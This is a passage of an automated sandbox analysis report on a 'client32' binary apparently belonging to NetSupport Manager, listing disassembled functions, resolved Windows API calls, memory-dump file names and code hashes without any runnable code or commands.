SetLastError.KERNEL32(00000078,?,?,68599BCE,?,?,?,?), ref: 68594E0D

Strings

InternetWriteFile, xrefs: 68594DDE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetWriteFile
API String ID: 199729137-2273844942
Opcode ID: 2f359217d3c3cf61b1b41fb6038e6f8b5f623a31c7f2feee71b4a18b341b6668
Instruction ID: d3e47f435d9466fa36ad9f308ace816e4207efc694a55009c9a44b3aec31aa19
Opcode Fuzzy Hash: 2f359217d3c3cf61b1b41fb6038e6f8b5f623a31c7f2feee71b4a18b341b6668
Instruction Fuzzy Hash: FAF05E76614228AFC720DF99D804A9B77A8EB48711F40841AFD5597240C671E810CFA5

Function 11017000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
SetLastError.KERNEL32(00000078), ref: 11017039

Strings

QueueUserWorkItem, xrefs: 1101700E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0

Function 68594D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 68594D94
SetLastError.KERNEL32(00000078,02B42AFC,?,6859B267,00000000,68596BD0), ref: 68594DB5

Strings

InternetSetStatusCallback, xrefs: 68594D8E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetSetStatusCallback
API String ID: 199729137-894424467
Opcode ID: 9da00872f1cea283c7ae1a1649133b870eafbe8c4a6dbff208699b6a5dd6d958
Instruction ID: 5ee7f3de0483ec66c799b3f32507f3ab0bfed22a79f5b09a5da557adc140e61d
Opcode Fuzzy Hash: 9da00872f1cea283c7ae1a1649133b870eafbe8c4a6dbff208699b6a5dd6d958
Instruction Fuzzy Hash: A4E06536944724AFC720AF98D848A9AB7BCEF44721F41445BED55D7200D671E840CBD0

Function 11031020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
SetLastError.KERNEL32(00000078), ref: 11031055

Strings

ProcessIdToSessionId, xrefs: 1103102E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ProcessIdToSessionId
API String ID: 199729137-2164408197
Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0

Function 11157300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(75BF1A30), ref: 11157303

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115731D

Strings

..., xrefs: 1115732B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_memset
String ID: ...
API String ID: 243528429-1685331755
Opcode ID: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
Opcode Fuzzy Hash: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0

Function 685ADC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 685ADC59

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

_memset.LIBCMT ref: 685ADC82

Strings

Refcount.cpp, xrefs: 685ADC6C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc_memset
String ID: Refcount.cpp
API String ID: 2365696598-3480236496
Opcode ID: baf27fe8afef23391ff23740882127b825b5fec662b5c086803bf65280c55887
Instruction ID: ef2d55bf166b70fd2ad4821a0048106b91b03f14d70d4b1aa3d43a89db7bf011
Opcode Fuzzy Hash: baf27fe8afef23391ff23740882127b825b5fec662b5c086803bf65280c55887
Instruction Fuzzy Hash: 7FE0C22BAC012577C15020DA3C16EEFBA5C4BE2DE9F850031FE0CA6241F6916D5141EA

Function 68594C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68594C44
SetLastError.KERNEL32(00000078,00000000,?,6859B677,?), ref: 68594C61

Strings

InternetCloseHandle, xrefs: 68594C3E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetCloseHandle
API String ID: 199729137-3843628324
Opcode ID: 2eac23ddf6233cd62f0a9ecce76bea5241ba22dea79b4b40652151221878621f
Instruction ID: 02e7a4ed6fd61c2d8e1da0e4005355e902d63d7eccfa9afd8f288fdac1f04e0f
Opcode Fuzzy Hash: 2eac23ddf6233cd62f0a9ecce76bea5241ba22dea79b4b40652151221878621f
Instruction Fuzzy Hash: D2E0D832944724AFC730EFA8D808A8ABBF8EF24721F41052BE955D7201C670E884CBD4

Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001096
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1

Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001073

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001056
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1

Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001103

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 110010E6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0

Function 1101D070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D086
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2663631564-2830328467
Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1

Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100113B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001126
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
